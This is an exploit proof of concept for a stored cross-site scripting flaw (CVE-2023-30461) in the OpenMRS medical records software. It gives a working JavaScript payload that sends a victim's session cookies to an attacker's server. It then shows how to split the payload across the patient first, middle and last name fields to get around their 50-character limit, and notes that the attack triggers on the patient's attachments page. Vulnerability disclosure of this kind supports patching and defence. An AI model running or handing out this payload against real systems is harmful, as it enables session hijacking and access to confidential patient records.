# Exploit Title: OpenMRS XSS Vulnerability in Attachments
# Date: 2023-04-09
# Exploit Author: Omar Tsai
# Vendor Homepage: https://openmrs.org/
# Software Link: https://openmrs.org/download/
# Version: 2.4.2, 2.12.2
# Tested on: OpenMRS 2.4.2, 2.12.2 Standalone
# CVE : CVE-2023-30461
# Proof-of-concept for XSS OpenMRS 2.4.2, 2.12,2
In this example, I will demonstrate a simple cookie-stealing attack using the three fields in a patient (First name, Middle name, and Last name).
## 1. Figure out the XSS payload
```sh
<script>$.get(`https://<my_server>/?`+document.cookie);</script>
```
Now we have to split this into 50-character limited chunks since each name field is limited to 50 characters only. Note that the backtick is needed for quotes since quotations are escaped in the field.
## 2. Split up the XSS payload into 3 parts
I will split the payload into 3 parts using a variable and the final jquery request:
**For the first name:**
```sh
<script>var a=`https://my-own`</script>
```
**For the middle name:**
```sh
<script>a+=`-simpledomain.cp,/?`</script>
```
**For the last name:**
```sh
<script>$.get(a+document.cookie);</script>
```
## 3. Save the patient information
Just click save
## 4. Execute XSS attack
The XSS attack can be triggered by going to the `attachments` page of the patient.
## 5. Get cookies
If you look back at your server logs, a GET request will have been initiated with the user's cookies